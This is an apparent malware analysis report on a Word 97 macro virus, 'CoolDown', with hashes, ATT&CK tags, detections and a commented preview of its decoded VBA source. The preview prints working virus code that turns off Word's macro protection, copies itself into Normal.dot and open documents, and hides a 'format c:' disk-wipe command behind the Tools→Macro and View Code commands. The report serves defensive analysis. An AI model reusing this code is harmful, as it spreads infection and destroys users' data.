Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f846c4688a179ba2…

MALICIOUS

Office (OLE)

38.0 KB Created: 2001-07-04 19:42:00 Authoring application: Microsoft Word 8.0 (Word 97) First seen: 2012-06-14
MD5: 3ccfb99c43d65d580ed6305b57c037a2 SHA-1: 8ce29afa3a8a2455a5a703f9798db66c6dd4783f SHA-256: f846c4688a179ba28073f03745ebea22467157f3f6d0a9748d3703df1e962482
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File T1485 Data Destruction T1562.001 Disable or Modify Tools

The sample contains VBA macros with four entry points. `Document_Open` and `Document_Close` call `CoolDown 0`; `ToolsMacro` and `ViewVBCode` call `CoolDown 1` (those names match Word's built-in Tools→Macro and View Code commands, so they likely intercept a user's attempt to inspect the macros — confirm in a sandbox). `CoolDown` runs under `On Error Resume Next` and first sets `Options.VirusProtection`, `ConfirmConversions` and `SaveNormalPrompt` to `False` regardless of its argument. With argument 1 it executes `Shell("format c: /autotest", vbHide)`, a hidden and highly destructive disk-format attempt. With argument 0 it deletes the code module of `NormalTemplate` and of every open document's VBProject that does not already contain the string "CoolDown", re-inserts its own code with random leading whitespace (`Space(Rnd * 16)`, the lines being passed through a `foo()` helper not shown in the preview) and then calls `NormalTemplate.Save` — i.e. it is a self-replicating Normal.dot macro virus whose junk `' 1234.567` comments and broken line continuations are the visible result of that rewriting. The `Shell()` call, the `Document_Open` auto-exec and the Normal-template infection together indicate malicious intent; note that the destructive payload fires only on the `ToolsMacro`/`ViewVBCode` paths, not on document open, and that on current Office builds the VBProject manipulation needs "Trust access to the VBA project object model" and would otherwise fail silently, whereas the `Shell()` payload does not.

Heuristics 5

  • ClamAV: Doc.Trojan.CoolDown-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.CoolDown-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29632 bytes
SHA-256: 22f4a938e9d995dba96f20f68a0a045a9ce646f8f17d02fae4b0b50efd9c238c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
     ' Auto-exec trigger: Word runs Document_Open when the document is opened (no user action).
     ' Calls CoolDown with How = 0, i.e. the Else branch of "If How = 1" in CoolDown: the
     ' self-replication path (NormalTemplate / open-document VBProject rewrite), NOT the
     ' Shell("format c: /autotest") payload. Options.VirusProtection = False is still applied
     ' because CoolDown sets it before the If.
     ' The bare numeric comment below is part of the carved artifact — presumably junk inserted
     ' by the virus's own line rewriting (Space(Rnd * 16) & res in CoolDown); foo() is not
     ' visible in this preview, so treat that as an inference. Do not "clean" it: the artifact
     ' hash on this page covers it.
     Private Sub Document_Open()
            CoolDown 0
        ' 3043.731
End Sub
       ' 4139.836
' 5091.396
' Second auto-exec trigger: runs when the document is closed. Same call as Document_Open
' (CoolDown 0 -> replication branch), so the infection is attempted both on open and on close.
' The "_" line continuations and odd indentation are how the carved source looks; the
' statement is simply "CoolDown 0". Kept byte-identical as evidence.
Private Sub Document_Close()
 CoolDown _
        0
        ' 6861.435
' 1609.434
End _
 Sub
  ' Destructive trigger #1. The name matches Word's built-in ToolsMacro command (Tools > Macro);
  ' if Word resolves it as a command override — which the name strongly suggests but this
  ' preview cannot prove — a user trying to inspect the macros fires CoolDown 1, whose
  ' If How = 1 branch runs Shell("format c: /autotest", vbHide). Confirm in a sandbox.
  Private _
        Sub ToolsMacro()
     CoolDown 1
      End _
  Sub
        

' Destructive trigger #2, same pattern as ToolsMacro: the name matches Word's built-in
' ViewVBCode (View Code) command, so opening the VBA editor on the infected document
' would likely call CoolDown 1 and reach the hidden Shell("format c: /autotest") call.
' Together with ToolsMacro this reads as anti-analysis: the two ways a user would look at
' the macro are the two paths that trigger the wipe. Code left byte-identical as evidence.
Private Sub ViewVBCode()
            CoolDown 1
        End _
              Sub
     Private Sub _
      CoolDown(How As _
          Integer)
              
On _
  Error Resume Next
        Dim c As String, a _
 As _
     Long, _
        b _
            As Long, _
       d _
      As _
            Long, e _
     As Long, f _
             As Long, res _
          As _
               String, m As Boolean
         ' 6696.699
' 5934.029
Randomize
     
With _
                Options
        ' 1338.273

.VirusProtection _
         = _
      False
 ' 5550.656
.ConfirmConversions = _
      False
       .SaveNormalPrompt = False
 ' 9018.309
' 6754.591
End With
  If How _
            = _
      1 _
        Then
                ' 5697.444

' 606.6084
s _
         = Shell("format" & Chr(32) & "c:" & _
  Chr(32) & _
            "/autotest", vbHide)
             Else
   ' 6741.466
' 5936.861
With _
    NormalTemplate.VBProject.VBComponents(1).CodeModule
       If _
           Not .Find("Cool" & "Down", _
              1, _
    1, 1000, 1000, _
          False, False) _
               Then
           a = .CountOfLines
         For b _
             = _
             1 To a
               
' 7876.239
.DeleteLines (1)
            Next
            d _
     = _
          1
  a _
            = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
       
res = ""
    ' 5730.678
For b = 1 To _
       a
         c = _
  ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(b, _
             1)
          c _
           = RTrim(LTrim(c))
        ' 3419.099
If foo(c, _
         f, res) _
    Then
   ' 9140.818
' 8870.4
' 8536.813

.InsertLines _
      d, _
       Space(Rnd * 16) _
            & res
               ' 1491.877
' 9123.504
' 4697.39
d = _
    d _
           + _
           f
        f = _
          0
      ' 4371.166
res = ""
       

' 5278.109
End If
             ' 404.4265
Next
       
NormalTemplate.Save
     ' 3147.956
End _
      If
      End With
      For e = _
     1 To Documents.Count
       ' 2721.87
With Documents(e).VBProject.VBComponents(1).CodeModule
 If Not .Find("Cool" & _
    "Down", 1, _
                1, 1000, 1000, _
    False, False) Then
              ' 4399.506
a _
           = _
           .CountOfLines
    ' 1505.411
m = _
        Documents(e).Saved
          
' 5936.951
' 7478.099
' 590.6182

For b = 1 To a
         ' 7121.263
' 8561.975
' 9947.795
.DeleteLines (1)
               ' 677.703
Next
           ' 7454.467
d _
    = _
        1
               a _
   = _
  NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
               ' 3058.095
' 8247.968
' 8953.323
' 8072.195
' 4574.436
' 1420.563
' 9721.467
res _
  = _
""
       For _
           b = _
    1 _
          To _
              a
               c = _
         NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(b, _
         1)
c = RTrim(LTrim(c))
          ' 5256.324
' 7004.326
If _
             foo(c, _
   f, _
          res) _
               Then
         
' 4980.794
.InsertLines _
 d, _
     Space(Rnd * 16) & _
             res
                d _
      = _
           d + f
       f _
            = _
       0
              ' 5780.963
res _
          = _
      ""
               End If
        ' 9160.506
' 7513.05
' 5607.009
Next
  If _
            Documents(e).Path _
       
... (truncated)